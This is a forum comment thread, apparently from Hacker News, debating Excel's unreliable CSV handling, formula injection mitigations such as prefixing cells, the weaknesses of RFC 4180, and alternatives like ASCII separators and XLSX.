> Well, despite plentiful advice on StackOverflow and elsewhere, I’ve found only one (undocumented) thing that works with any sort of reliability: For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.
>Unfortunately that’s not the end of the story. The character might not show up, but it is still there. A quick string length check with =LEN(D4) will confirm that.
The documented way is prefixing with a ' character. It doesn't have the length issue either.
As to the root issue, I can't think of any perfect way to transfer a series of values between applications that apply different types to those values and applications that don't. At some point, something is going to have to guess.
> The documented way is prefixing with a ' character. It doesn't have the length issue either.
It is suggested in comments, but the author answered
> Yes, this prevents formula expansion... once. Unfortunately Excel's own CSV exporter doesn't write the ', so if the user saves the ‘safe’ file and then loads it again all the problems are back.
That's it. My pet peeve issue with Excel/CSV is USA zip codes. Excel will happily eat leading zeros. There is a specific number format to correct that. If you export that file to CSV with the format set the CSV file will have 5 digits. If you reopen that CSV file in Excel it gobbles up the zeros all over again.
As someone mentioned elsewhere this is an issue with long numbers. Excel converts them to scientific notation. Reformat and export, all good. Reopen said file, back to scientific notation.
Really anything that relies on an escape character (') or a specific format gets lost on export to CSV. It exports correctly but there is simply no way to document these formats in a CSV file and have it be compatible with anything but Excel.
Same with phone numbers. In most parts of the world, local numbers (not fully-qualified with country code), are written/dialed with a leading zero.
Excel eats these and/or uses scientific notation!
If you use Data -> From Text, and on Step 3 select all the columns and make them "Text", that will prevent Excel from mangling any of the data (stripping leading zeros, evaluating strings starting with = as formula etc.)
Excel somehow has one of the worst CSV parsers I have ever used. You would think this is something that should be bread and butter for a spreadsheet app, but it does a surprisingly terrible job.
Came here to say the same. Also tested it to confirm and the single quote mark inside the double quotes does indeed force interpretation as a string instead of a formula. In both Excel and Google Sheets.
Interestingly, in Excel removing the quotes entirely also causes a formula to be interpreted as a formula and text (even with spaces) as text and numbers as numbers.
In my testing, quotes are only needed when a field contains a comma to prevent it being interpreted as a delimiter.
"transfer a series of values between applications that apply different types to those values and applications that don't"
If we thought about it as an API mechanism, we would parse the strings and apply rules to sanitise or reject it.
Here is a principle for thinking about data. Distinguish internal data structures (persistence, search) from interchange structures (APIs). Codebase A should not be able to directly access the structures of Codebase B. To communicate, they must use explicit APIs.
At the moment, this principle is not mainstream. The CSV loader is not sure if it is loading an interchange format or persistence format. Another, that happens regularly: (1) developer builds a database as a storage mechanism. (2) developer decides to have other separate codebases query into that database. Is the database an application-data-structure (interal) or an API (external)? It is acting as both.
The applications that are communicating either have to agree on the types in advance or they have to use an interchange format that makes it explicit. If your applications don't both know the types in advance then you shouldn't be using CSV.
I think the common model people had of CSV was that it was an imperfect way to transfer values, but safeish from code execution, XSS or "all your Google account data gets exfiltrated" type effects.
Users associate application behaviour with file formats.
Analogy: people think PDF files are safe, but aren't aware of the constant stream of RCE vulnerabilities that is Acrobat Reader & how widely it's used, which invalidates their model of behaviour associated with PDF files.
i don't know why spreadsheet applications don't standardise on a file extension that they won't screw with. call it csf or something. treat it like pure CSV except don't interpret =/@ or any of the other weirdness. basically just interpret all fields as plain strings as default [even if they look like numbers]. this way everything is backwards compatible old 'weird CSV' files still work and those that care about their users can use .csf and the files won't endanger their users.
That would make safety an "opt in" measure, it should be "opt out" instead. Make the CSV format stop interpreting formulas unless you specifically ask it to. Most people don't put formulas in their CSV files anyway.
Excel is the source of so many problems. At work, we ask users for an input in CSV or Excel format, and most people see "CSV" and export Excel data as CSV. Which is fine and great, but long numbers - such as UPCs - show up in Excel as scientific notation, being big scary numbers, and also get exported as such.
So when an Excel cell contains the UPC 123456123456, we get a CSV file that contains "1.23456E+11", which is worse than useless.
I used to work in third-party logistics and a big project of mine was an automated file import process, so folks could send us their daily/hourly orders for processing and fulfillment. I'd say roughly 65-70% of the entire code base was error handling and figuring out when to kick out a file for human review and/or outright deny it and contact the customer.
The hardest ones to work with were the mom and pop shops who suddenly had some success on Amazon and came to us after fulfilling out of their garage for a year and a half. Try telling a semi-retired 60 year old electrician in the middle of Iowa that the file he sent is worthless because none of the product codes match what you have, especially when once he closes the file he doesn't have any idea where it is.
A long time ago I did the same work with banks. The effect was the same. It was amazing to me how bank employees could somehow find a way to regularly insert ASCII control characters into a CSV value.
On a consulting project a few years ago, I was brought in to help a Fortune 500 energy company make sense of the value at risk model that one guy had built over 20 years in VBA. Most of it was pulling from excel spreadsheets brokers would send daily with prices. What. A. Nightmare.
It was hard to decide what I hated most about the project. The mind numbing stupidity of it. That fact that managers had allowed this single point of failure, and then let the guy leave. Or... that it was all a fictitious dance, pursued because spinning off their trading operations, would get them millions in tax subsidies.
I was introduced to programming by my father. He's a business analyst of sorts, so naturally he only knows VBA.
After he left his job, some poor soul had to inherit his massive collection of VBA scripts, which more or less automated his day-to-day work. I think he showed the new guy what buttons to press on his spreadsheets, but I can't imagine he understood any of the Excel-fu my father had done. The legacy architecture that is tied to Excel in all sorts of businesses.. it's crazy.
These are the exact problems we're banging our heads against.
The worst part is that it's not something that can be solved with an external dependency on some new startup - that would just add another layer we'd have to go through in the error cases, which would be numerous.
God, I wish I could share some of the files we've received. I cannot conceive what sort of monster would write a data exporter that would produce these unreadable things.
CSV is the source of so many problems. CSV has no character set, no rule for escaping double-quotation marks, commas, and newlines. There's not even a way to look at a CSV file and tell what it's "rules" are beyond heuristics and those only take you so far.
I ask for XLSX files since at least it's structured, unambiguous and documented, but even better: a minimal XLSX parser is trivial (about a page) to write.
Also: Educating users on how to specify the character set in every application that the user seems to want to use is a special kind of hell.
I'd say that the spreadsheet model is long in the tooth, but there has been a failure of will in the industry to kill it.
People use Excel when they should really use a database, they use it because they want to format something on a 2-d grid, edit tabular data, make plots, do calculations, make projections, etc.
The problems go down to the data structures in use.
For instance there is nothing 2-dimensional about financial reports (and projections), really financial reports are hyperdimensional. Proper handling of dates and times is absolutely critical. Also the use of floating point with a binary exponent is a huge distraction in any kind of math tools aimed at ordinary people. (Mainframes got that right in the 1960s!)
Google Sheets is just a stripped down version of Excel and other than the ability for multiple people to work on it simultaneously, is really no better.
It's always fun to look down on the likes of Excel and PHP etc. Of course, we should try to learn, too.
Excel for all its faults is easy for beginners to pick up. Semi-technical people can quickly hack together a bug-ridden prototype of their ideas. In most companies the alternative is not well-written software, but spending countless meetings to get IT to spend millions to provide a bug-ridden prototype in a few years time.
One of the main problems with Excel as I can see it is that it is effectively a write-only language. Auditing an Excel sheet is famously almost impossible. And that's before you add VBA in the mix.
Since I mentioned PHP: one of the best things I can say about the language and its ecosystem is that they made it really easy to add a 'web-counter' to your otherwise late 90s static html-only page on shared hosting. You begin with a web-counter, and then just keep on copy-and-pasting.. Haskell is not nearly that easy to pick up, even if you are prepared to do it badly.
So true. At my wife's accounting firm they recently moved from excel to Postgres. Accountants now interact with the database directly rather than messing with the mess that is excel and everyone is better for it.
That's not at all helpful unless the document comes with a statement that it complies with RFC4180. His point wasn't that there are no standards for doing so, more that there are so many standards for doing so, and it's near impossible to determine which standard a document uses by itself.
RFC 4180 just tried to write down what the most common quirks of CSVs were in the wild at the time. It's a reference more than a specification.
It's really a missed opportunity. Had they had the balls to actually specify CSV properly this wouldn't be nearly as much of a problem. This would have probably left a lot of the existing CSV writers non-conformant, but it would have likely improved the future situation considerably.
It doesn't even need to be complex. Just a few rules:
(basic CSV spec here)
1. Reserved characters are , " \
2. If a reserved character appears in a field, escape it with \
3. Alternatively you can double quote a field, in which case you only need to escape " characters in the field
4. Line endings are either CR, CR/LF, or LF. Parsers must suppport all line endings.
5. Character set is UTF-8, however the " , and \ characters must be 0x22, 0x2C, and 0x5C. Alternative language lookalike characters will not be treated as control characters.
6. Whitespace adjacent to a comma is ignored by the parser
RFC4180 is worse than worthless; Do not implement it and claim you support "CSV files". Almost every paragraph is useless, wrong, or dangerous; it's few citations offer conflicting and sometimes clearly-stupid advice where they advice the use of CSV at all. Some examples:
§ 2.1 says that lines end in CRLF. This is in opposition to every UNIX-based system out there (which outnumber systems that use CRLF as a line delimiter by between 2:1 and 8:1 depending on how you choose to estimate this) and means that CSV files either don't exist on Mac OS X or Linux, or aren't "text files" by the standard definition of that term -- both absolutely silly conclusions! Nevertheless, following RFC4180-logic, § 2.6 thus suggests that a bare line-feed can appear unquoted.
§ 2.3 says the header is optional and that a client knows if it is present because the MIME type says "text/csv; header" then § 3 admits that this isn't very helpful and clients will have to "make their own decision" anyway.
§ 2.7 requires fortran-style doubling of double-quote marks, like COBOL and SQL, and ignores that many "CSV" systems use backslash to escape quotes.
§ 3 says that the character set is in the mime type. Operating systems which don't use MIME types for their file system (i.e. almost all of them) thus cannot support any character set other than "US-ASCII".
None of these "suggestions" are true of any operating system I'm aware of, nor are they true of any popular CSV consumer; If a conforming implementation of RFC4180 exists, it's definitely not useful. In fact, one of the citations (ESR) says:
The bad results of proliferating special cases are twofold. First, the complexity of the parser (and its vulnerability to bugs) is increased. Second, because the format rules are complex and underspecified, different implementations diverge in their handling of edge cases. Sometimes continuation lines are supported, by starting the last field of the line with an unterminated double quote — but only in some products! Microsoft has incompatible versions of CSV files between its own applications, and in some cases between different versions of the same application (Excel being the obvious example here).
A better spec would be honest about these special cases. A "good" implementation of CSV:
• needs a flag or switch indicating whether there is a header or not
• needs to be explicitly told the character set
• needs a flag to specify the escaping method \ or ""
• needs the line-ending specified (CR, LF, CRLF, [\r\n]{1,}, or \r{0,}\n{1,})
... and it needs all of these flags and switches "user-accessible". RFC4180 doesn't mention any of this, and so anyone who picks it up looking for guidance is going to be deluded into thinking that there are rules for "escaping double quotes" or "commas" or "newlines" that will help them consume and produce CSV files. Anyone writing specifications for developers who tries to use RFC4180 for guidance to implement the "import CSV files" feature is going to be left to dry.
The devil has demanded I support CSV, so the advice I can give to anyone who has received a similar requirement:
• parse using a state machine (and not by recursive splitting or a regex-with-backtracking).
• use heuristics to "guess" the delimiter by observing that a file is likely rectangular -- tricky, since some implementations don't include trailing delimiters if the trailing values in a row are missing. I use a bag of delimiters (, ; and tab) and choose the one that produces the most columns, but has no rows with more columns than the first.
• use heuristics to "guess" the character set especially if the import might have come from Windows. For web applications I use header-hints to guess the operating system and language settings to adjust my weights.
• use heuristics to "guess" the line-ending method. I normally use whatever the first-line ends in unless [\r\n]{1,} produces a better rectangle and no subsequent lines extend beyond the first one.
A successful and fast implementation of all of these tricks is a challenge for any programmer. If you guess first, then let the user guide changes with switches, your users will be happiest, but this is very relative: Users think parsing CSV is "easy" so they're sure to complain about any issues. I have saved per-user coefficients for my heuristic guesses to try and make users happier. I have wasted more time on CSV than I have any other file format.
My advice is that we should ignore RFC4180 completely and, given the choice, avoid CSV files for any real work. XLSX is unambiguous and easy enough that a useful implementation takes less space than my criticism of CSV takes- and weirdly enough- many uses of "CSV" are just "I want to get my data out of Excel" anyway.
To me the issue isn't how we should read in CSV (as you stated, we should use a different format that is less ambiguous) but rather getting vendors to provide the data in that new format. I've found that most vendors I work with are using a cobbled together solution built on top of a mainframe and getting them to add/remove a field from CSV is a monumental task, there is no way they will move to a different format like XLSX or JSON or XML. Until there is an open, industry-wide standard, I just don't see CSV going away
None? You seemed to have touched mostly on consuming CSV and safe ways to do that and suggested XLSX - I'm just adding that digesting CSV safely isn't our biggest issue, it's getting vendors to use something other than CSV and unfortunately that is typically out of most people's control.
I've used several different characters for escaping, though I don't know why backslash (\) isn't the default universal one. It seems pretty sensible, it's used across multiple scripting languages and CLIs. If you need to escape a backslash, you escape it with a backslash.
The comma-separated-value file almost certainly comes from list-directed I/O in Fortran, which used doubling of quote characters to "escape" them. This was probably an IBM-thing since other IBM-popularised languages also do this (including SQL and COBOL). As someone else pointed out, RFC4180's own interpretation of "csv" also does this.
My guess is that they did this because parsing and encoding was simple (only a few instructions) on these systems and required no extra memory.
You mean does Google Sheets suffer from the same vulnerabilities? IMPORTXML is a Google Sheets function and isn't in Excel.
My php-based xlsx parser is about 100 lines. If you don't need time series you can save almost twenty lines. Strings cost about ten lines. Even still, whilst it may not support every string-type or every time format, it is more reliable than any CSV parser...
If you are opening up the resulting file in excel, yes. If you are writing your own minimal XLSX parser like geocar say he has, probably not. It's unlikely that your own parser is going to implement the functionality to go send an arbitrary AJAX request.
Export side you obviously can't control :( But on import, if you use Data -> From Text, and on Step 3 select all the columns and make them "Text", that will prevent Excel from mangling any of the data (stripping leading zeros, evaluating strings starting with = as formula etc.)
Really quite rich people relying on Excel for economic world-scale critical stuff has ruined/cost more than a few lives. Do you blame Bill for his shitty software or do you blame the rich corporate types for not giving a shit/incompetent minimum effort IT?
The thing that puzzles me the most is, that people use _C_SV at all. Separation by comma, or any other member of the printable subset of ASCII in the first place. What this essentially boils down to is ambiguous in-band-signalling and a contextual grammar.
ASCII had addressed the problem of separating entries ever since its creation: Separator control codes. There are:
x01 SOH "Start of Heading"
x02 STX "Start of Text"
x03 ETX "End of Text"
x04 EOT "End of Transmission"
x1C FS "File Separator"
x1D GS "Group Separator"
x1E RS "Record Separator"
x1F US "Unit Separator"
You can use those just fine for exchanging data as you would using CSV, but without the ambiguities of separation characters and the need to quote strings. Heck if payload data is limited to the subset ASCII/UTF-8 without control codes you can just dump anything without the need for escaping or quoting.
So my suggestion is simple. Don't use CSV or "P"SV (printable separated values). Use ASV (ASCII separated values).
This comes up every single time someone mentions CSV. Without fail. The bottom line is that CSV is human readable and writable in plain text. If you start using fancy ASCII characters, then it becomes neither because our text editors don't support it.
Let's send patches to text editors so they render fancy ASCII characters? I also find it amusing that "fancy ASCII characters" is even a statement that can make sense, there's only 127 ASCII characters!
Sure. Send patches. Until it becomes easy to read and write fancy ASCII characters in text editors, my criticism stands.
I predict this will never happen under the principle of "good enough to use, bad enough to complain on HN." My point is that people keep suggesting ASCII delimiters as if it's some obvious solution that solves the entire problem, but it doesn't. People should instead be suggesting that text editors better support ASCII delimiters so that we can use them roughly as easily as we use commas today.
Explain to me why humans have to be the ones to write proper syntax and escaping, instead of their editors. Do you do this for other formats, like RTF? What is this obsession with hand-coding complicated formats :)
No, but I do it for formats like HTML, CSS, JSON. My editor can assist me, but I don't need it. To a lesser degree, the same is true of Java, though I do admit to leaning much more heavily on my IDE for that.
> What is this obsession with hand-coding complicated formats :)
Well, part of it is that they're not all that complicated unless you're doing something fancy. Another part is almost certainly our (we as in developers) pride in being able to use nothing but vi installed on a decade-old operating system to get things done.
Why? What benefit do you get from coding it by hand? The only one I can think of is being able to type some esoteric incantations in a textbox.
Downsides include:
XSS and malicious injection - users should be using markdown or provided an actual contentEditable HTML editor instead of a textarea. Like in GMail.
Syntax errors. How many times have you typed some JSON by hand and realized you forgot to balance some braces or add a comma, or remove a comma at the end of an object?
Complexity not that complicated, really? Basic C, HTML, CSS is not complicated. Advanced stuff is complicated. Forgetting a brace or a semicolon torpedoes the whole document. SQL is not complicated. Does that mean you want to write SQL by hand for production code?
Why don't you install a simple extension to vi like an html format adapter? I'm a developer too. But let me tell you what it sounds like when you say you want to use nothing but vi: that's like saying you want to be able to build robots using nothing but a hammer and some nails, and nothing else can be built that requires further abstraction or advancement where you can't do the same with a hammer.
And also keep in mind that not everyone is a developer. The fact that you like to keep esoteric syntax rules in your head for HTML, XML, CSS, Javascript, C++ and so on doesn't mean EVERYONE should have to. When it comes to CSV, it's not even a real standard. You have to keep in your head all the cross platform quirks, like \r\n garbage similar to how web developers need to keep in their head all te Browser quirks and workarounds.
All this... for some pride thing of being able to write text based stuff by hand.
I brought up RTF for a reason. No sane person should want to type .rtf or .docx by hand. So why HTML?
CSV is complicated in the same way the DOM and Javascript is complicated:
1) there are so many differences between browsers that you have to keep them all in mind when asking people to send you csv files, or generating them, etc. Such as for example \n vs \r vs \r\n and escaping them.
2) You have to keep in your head escape rules and exceptions, and balancing quotes and other delimiters.
3) The whole thing doesn't look human readable or easily navigable for a document of any serious complexity.
And what's the upside? If more people just used Excel or another spreadsheet program to edit these files, you won't face ANY of these issues. They would eventually converge on a standard format, like they did with HTML.
> there are so many differences between browsers that you have to keep them all in mind
Compatibility horrors from people violating the standard will appear no matter what format you use. That's not fair to blame on the format.
> You have to keep in your head escape rules and exceptions, and balancing quotes and other delimiters.
CSV itself has newlines, commas, and quotations marks for special characters. That's extremely minimal. The only extra thing to keep in your head is "is this field quoted or not".
What set of escapes and delimiters could be simpler? Would you rather reserve certain characters, and abandon the idea of holding "just text" values?
> The whole thing doesn't look human readable or easily navigable for a document of any serious complexity.
> And what's the upside? If more people just used Excel or another spreadsheet program to edit these files, you won't face ANY of these issues. They would eventually converge on a standard format, like they did with HTML.
This sounds like you're arguing for a more complex format! I'm confused.
> What set of escapes and delimiters could be simpler? Would you rather reserve certain characters, and abandon the idea of holding "just text" values?
I can no longer remember where I saw it (thought it was lua), but I heard the idea to use =[[ ... ]]= and =[[[ ... ]]]= as wrappers (a bit like the qq operator from perl). They can be nested and don't interfere, so =[[[ abc =[[ ]]= ]]]= is a legitimate string.
Except when the compatibility horror comes from Excel violating the standard, but only if you happen to be located at the wrong hemisphere (hello semicolons). So, even if everyone just used Excel, you will still face this issue. Now what?
I am not arguing for another format. I am arguing for using a program to edit these files, to avoid syntax errors and other crap that arises when people do manual stuff that doesn't need to be done manually. And sure the format can stand to be slightly more complex, who cares if you're not editing it by hand.
Ascii text format is simple.
Anything where you have arbitrarily complex structure, why not use a program to edit it? What is the downside of using the right tool for the job? Your text editor is a program. Why tunnel through text and manually edit stuff?
Does any system (modern or not) actually use `\r` for anything? Because I'm not aware of it being used alone. I'm not even sure why software today still differentiates between the two instead of treating any of `\r`, `\n`, `\r\n` as a single line break. I can maybe see it being useful eg in word processor to differentiate manual line break from paragraph break, but that's not a plain text format; in the vast majority of cases, treating them as the same character in parsers shouldn't* cause any issues.
Honestly I dispute that it is "human readable". It is sort of legible but incredibly inconvenient to read or manually write. They might be slightly more convenient than tabular files such as ACH or DDF
Consistent? What do you mean, "consistent"? Sometimes it's comma separated, sometimes it's semicolon separated (depending on the user's locale), sometimes it's separated by tabs (because it's a _C_SV file, yeah, no biggie), no content encoding hint (Unicode? Latin-1251? Win-1252? Nobody knows), not to mention you've written this comment under an article that shows just about the least consistent behavior ever. (Line breaks? Ahahahaha!)
The only consistent thing about CSV is its ubiquity; other than that, it's a hairy, inconsistent mess that appears simple. (Source: having parsed millions of blobs that all identified themselves as CSV, despite being almost completely different in structure.)
You would think so, but people are dumb. I've seen tab-delimited files that are .CSV instead of .tsv, and I've also seen the semicolon delimiter a few times though I can't recall where. I think Excel actually pops up a prompt when importing to confirm the delimiter in some cases?
From your link, it's quite clear that you should not assume any particular CSV file to follow any particular rules.
> Interoperability considerations:
> Due to lack of a single specification, there are considerable differences among implementations. Implementors should "be conservative in what you do, be liberal in what you accept from others" (RFC 793 [8]) when processing CSV files. An attempt at a common definition can be found in Section 2....
> Published specification:
> While numerous private specifications exist for various programs and systems, there is no single "master" specification for this format. An attempt at a common definition can be found in Section 2.
Section 2 states:
> This section documents the format that seems to be followed by most implementations:
"All theory, dear friend, is gray, but the golden tree of life springs ever green." -Goethe
If CSV were indeed always comma-separated, my hair would be at least 5% less gray. Alas, most programs emit semicolon-separated "CSV" in some locales (MS Office, LibreOffice, you-name-it-they-got-it).
Of course, I understand that your academic position "if it chokes the RFC-compliant parser, it's not a True CSV and should be sent to /dev/null" tautologically exists - but for some reason, users tend to object to such treatment (especially when they have no useful tools that would emit your One True Format for them).
TL;DR: there is no single standard fitting all the things that call themselves "CSV".
In other words, as soon as you start exchanging data, you'll get something that is complex, broken, or (most common case) both. Existence of a simple, consistent general format has not been conclusively proven impossible, but I have yet to see one in practice.
(Of course, everybody and their dog have cooked up simple data schemes, yes, but those are a) domain-specific, and b) not in widespread use.)
The article kind of addresses this. There are millions of spreadsheets and applications out in the wild that use CSV to communicate.
Sure, if you're building some kind of system where you need to ingest data from one application from another application you control, then using a different interchange format like ASV is an option. But then people tend to use more powerful formats like JSON or XML.
> There are millions of spreadsheets and applications out in the wild that use CSV to communicate.
That, and data in CSV format is human readable in any old text editor or even work processor which many use as a quick sanity check to make sure their data looks sane. A lot of editors will not display the ASCII control characters at all so the fields on the line get mashed together, or may even reject the file as containing what it considers to be unexpected characters.
More to the point, it's easy to export from Excel, which is a massive pain to load in any non-.NET language.
While it's great to hope to use a well defined transport for machine-to-machine communication, it's exhausting to explain anything beyond CSV to Bob from sales.
Give me a version of every standard text editor that can let me display and edit these ASV files when I just need to quickly hack something, and sure, I'll use it. CSV is directly editable in any text editor and manipulable by standard text processing tools, that's one of its key advantages.
I cannot remember how often, when I worked in 'enterprise software', we were sent CSV files by companies, and they were completely broken after someone 'simply edited' them with a 'standard editor'. More than a 1000x for sure over the years.
Worse; most 'non computer people' cannot get them imported into a spreadsheet properly (for whatever reason; usually it just puts everything in one field or column, people curse and give up), so they have to edit them in Notepad or worse, in MS Word and then send them back.
I distinctly remember receiving a .rtf file attachment from a user who was "sending me a CSV" and I had one of those daydream fantasies about tossing the computer out of the window and walking out.
ASCII Name - Vim Insert - Visual Repr
--------------------------------------------------
Start of Heading - Ctrl-v Ctrl-a - ^A
Start of Text - Ctrl-v Ctrl-b - ^B
End of Text - Ctrl-v Ctrl-c - ^C
End of Transmission - Ctrl-v Ctrl-d - ^D
File Separator - Ctrl-v Ctrl-\ - ^\
Group Separator - Ctrl-v Ctrl-] - ^]
For insertion you can also always just Ctrl-v DDD or Ctrl-v xHH where DDD is the three digit decimal value or HH is two hex values of the ascii code.
For some context in case anyone was curious, Wikipedia believes that both vi and Emacs were (originally) written in 1976, which is 41 years ago. Unix dates from ~1969--1973 depending on your definition, which is 44--48 years ago.
Accordingly, the reference to "54 year old" appears to be to the first standard as well as first commercial use of ASCII, in 1963.
That first ASCII standard from 1963 specified eight "separators" simply named S0 through S7 at codes 0x18--0x1F. The 1965 update reused the first four for other purposes (eg cancel and escape) and labeled 0x1C--0x1F with the more descriptive names we now know.
The number of devs who can competently use Vim or Emacs is already on the low side. The number of non-devs that can do it is far lower. The file needs to be editable by _any_ user with a text editor, not just a developer versed in Vim/Emacs.
I know the response will be "they'll just open it in Excel anyway" which is true in most cases, but I frequently have clients that want to download an export, modify it real quick with a text editor (many use Notepad++ for this), and then reupload it. They're usually doing massive find/replaces on the data and then reuploading into the system and a simple text editor is a lot better for this than Excel.
> The number of devs who can competently use Vim or Emacs is already on the low side. The number of non-devs that can do it is far lower. The file needs to be editable by _any_ user with a text editor, not just a developer versed in Vim/Emacs.
Emacs defaults to a menu + toolbar and the arrow/pageup/pagedown/home/end keys are functional. There are buttons with icons and labels for new document, open document, find in document, and copy/cut/paste. It's friendlier to use than something like Notepad++, gedit, or kate out of the box for simple editing. For more complicated stuff, there are menus and extensive documentation. The narrative that emacs is impossible to use for any but the programming elite doesn't fit the default experience.
If you define competently use as can extensively configure beyond the default state, then I'd argue that very few recent developers outside of those who use vim/emacs users have ever done so. How many people have you met who have written C# to extend Visual Studio or some Java to extend Eclipse/IntelliJ. Even with things like Atom, how many of those Atom users are writing Javascript packages versus using the packages someone else wrote?
If you define competently use as "be able to edit and debug in $x language", I'd argue the menu-driven approach in emacs is just as valid as the menu-driven in approach in any other random gui editor. The difference is that emacs can be customized and has decades of documentation and examples to pull from for any conceivable scenario. Want to interact with your editing environment with foot pedals, talk on that fancy new chat interface, interface with a serial port to pull sensor data or control a personal massager? You can find someone who has done it and documented it on emacs.
CS PhD and professional software engineer here. I can edit files very slowly and inefficiently in both vim and emacs but it would be a mess to use them for real work.
Some people never learned either of the editors. So what? The physical act of writing text was never the hard part of software engineering.
I don't think this necessarily addresses the security vulnerabilities in the article, which involve abusing the application reading the CSV, not the file format itself.
If Excel decides that text between Start of Text and End of Text that begins with a "=" is a formula, then you're in the same spot.
I am happy when I see I can get data via CSV over the other delivery methods people use. My local school board prints out all their data and then scans them into a PDF, ugh. I had one vendor that on purpose made the data only available in forms that would take me 600+ lines of code to clean up in mangled ASCII format.
I use CSV all the time when I am working with R. My data can come in the form of CSV, XLS, or PDF. Which would you want to work with?
I can easily look at the data. I never touch my incoming data and my output is in reports, but CSV can be the easiest way to get data into a computer.
Actually, XLS is not bad to work with, if you have a library for it. And it's well defined, unlike CSV. Insofar as I know, there's no way to make a CSV file that will open and show nicely in all popular versions of excel / google docs/ open office, especially across language settings. And a well formed XLS file will just work.
We recently went through an external pentest simulating a hostile actor with inside information. We had 2 weeks to prepare and successfully defended against timing attacks, DDoS attempts, identity spoofs, request modifications, script injections etc. Passed with flying colors... except for CSV/Excel injection. Everyone looked at each other with the sheepish embarrassment of being pwned by a script kiddie. This was a total blind spot indeed, even after we reviewed every other user I/O.
I wrote "script kiddie" as a way to describe the relative complexity of this attack vector - I was highly impressed with the pentest process, and think it's one of the smartest things we did this quarter.
Filtering user inputs is security 101, yet we missed this while focusing on fancy defense mechanics. This large gap between what the engineering team prepared for, and how they were exposed, is what made the outcome "embarrassing" - hence I agreed with GP that CSV/Excel stuff could be a blind spot even for well-trained people.
Generating CSV/Excel extracts, which included the user's first name and feedback comments verbatim - thus creating 2 injection points for malicious formulas.
CSV is hell. Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons (who would have thought files would be shared across country borders!?), so when we open CSV files that are actually comma separated all the information is in the first cell (until a semicolon appears).
To get comma separated CSVs to show properly in Excel we have to mess around with OS language settings. CSV as a format should have died years ago, it's a shame so many apps/services only export CSV files. Many developers (mainly US/UK based) are probably not aware of how much of a headache they inflict on people in other countries by using CSV files.
A CSV importer absolutely needs to be configurable. I've seen delimiters including tabs, vertical bars, tildes, colons, and random control characters (they didn't even choose RS and US).
Good luck with configuration if your CSV parser is ten layers removed from any human, and still needs to get it right. Now what? (Now we guess. We call it "heuristics," of course.)
That copies the data from the CSV file into a worksheet, you aren't editing the CSV file anymore.
I'm not just being pedantic, it makes a big difference. If I want to change some values in a spreadsheet I should be able to just open it, change the values, save, and be certain that the document will be identical apart from the deliberate changes. This is especially important for CSV files, which are commonly used for import/export operations.
I think I understand your use case, but in that case aren't there better apps for that? Excel is not a CSV editor. Even if they would look very similar...
If you open a .csv file in excel and save it, you may find that it has converted any long numbers into scientific notation for you, and saved that as text. It will also get rid of any leading zeros for you.
Also it will round those numbers silently to 15 digits.
It was a fun time explaining to accounting why their report showed duplicate billing events. Try telling an accountant "Don't use Excel". The solution of course was to prefix a "'" character, making the file useless outside of spreadsheet programs.
This is the classic response of the Excelista. "You're holding it wrong". Yeah well Excel is a hammer with two claws and no handle, there's no right way to hold it.
If Excel isn't for opening CSV files why does it associate itself with that extension by default? Why does it implicitly convert the CSV file to a half-assed Excel workbook? Why is there no option to change this behavior?
I haven't used excel in years, so your rant is a bit misdirected. There's a simple reason why it associates that way - it can open CSV files. Same as notepad associates to things which it's useless for. (but if you don't have anything else, it will work)
I'm just saying that editing CSVs regularly, preserving the formatting, while avoiding the import/export functionality is a very specific use case. It's likely not something excel project managers care about that much either. If the use case is popular, then there's going to be an editor that does it better. If not... tough.
Sorry, I didn't intend that rant to be directed toward you specifically. I just mean that your comment sounds like something those Excel project managers would tell me and I'm tired of hearing it.
After years of hearing "that's not what Excel is for" I am left wondering what it is for. I have asked many "Excel pros" how to solve some problem in Excel and I honestly can't think of any satisfactory answers. Just "that's not a common use case".
The CSV behavior is just one of the annoyances. Conflating display format with data type is another. Silently changing data is another. My list of gripes with Excel is long and on this topic my fuse is short.
My experience is that Excel is the Swiss Army Knife application, sufficing to do almost any job even if it's not the best choice. Being installed on almost every desktop means it becomes the first choice tool for almost any task.
> Semicolons are really better though, because they aren't used as a decimal separator unlike commas in most countries.
If you're going to separate values with semicolons--which is perfectly reasonable--I feel like you probably shouldn't do that with a format called Comma Separated Values.
Picking a less-common separator might help but you could also just follow RFC 4180 and quote fields that have commas then double any single quotes in values.
The only good CSV dialect is the dif-named DSV (Delimiter Separated Values) where you select and support just one supported delimiter, and you require escaping of the delim character inside values. It's simple, it works. Quotes are hard to parse so don't use those. Just \escape.
Unicode is vast. There's absolutely no good reason we don't have Snowman Separated Values (or some other proper separator sign that isn't commonly used elsewhere) other than that people don't demand it.
Where can I find those on my keyboard? Entering escape sequences by hand isn't user friendly, if it works at all. One of the benefits of csv is that it's universal, I can open it in vim or write an awk script to extract values, someone else can open in notepad++, someone else should be able to open in excel.
Just thinking out loud here, but isn't part of the point is that they are not keyboard characters. If they're on the keyboard, then they will pop up in ordinary text, similar to the | (pipe) character and friends.
They are ^\ ^] ^^ and ^_, respectively. Of course, most text editors will interpret those keys as something else. In emacs you can enter them literally by using C-q (quote) first.
Since we're kind of talking about things from an I18N perspective, those characters are written like this on a bog standard Swedish keyboard:
\ is AltGr+?
] is AltGr+9
^ is Shift+^, then space
_ is Shift+-
AltGr is the right Alt key, to the right of the space bar.
So none of those are single keys, which means that combining them with Ctrl to write control characters becomes almost comically difficult. Not very accessible to typical users, I'd say.
Actually \ is AltGr++, i.e. "+" is the symbol you get from that key without any modifier. With shift you get ? and with AltGr you get \. My bad, and too late to edit.
While XLSX is proprietary by descent, it is standardized; thus, it's readable/writable by man and machine alike (essentially a zipped XML with some bells and whistles). I have not encountered a less broken format that is similarly widespread.
Well, some of the issues are shared between CSV and XLSX. However, it does have a clear distinction between structure (which also can be validated!) and content (which moots the issue with comma-semicolon-tab separation), a well-defined character set and somewhat-sane character escaping rules.
It does have similar "executability" issues as CSV (and more), but 1. the formula evaluation is documented and expected behavior, 1b. there is a documented way to suppress it, and 2. programs reading it are aware that security is a thing, and either a) constrain/sandbox it (in the case of table processors such as MSOffice or LibreOffice), or b) don't execute its macros and expansions at all (in the case of libraries such as PhpExcel). Not sure about the Google Docs issue.
(As far as "common knowledge" - knowledge for manual inspection of strings is IMNSHO not required, all that's needed is that it's program-readable; in this respect, most table processors are capable of this. The point "but you can inspect CSVs by hand" comes from experience: it is also possible to inspect binaries by hand, neither of these is intuitive, both are a learned skill)
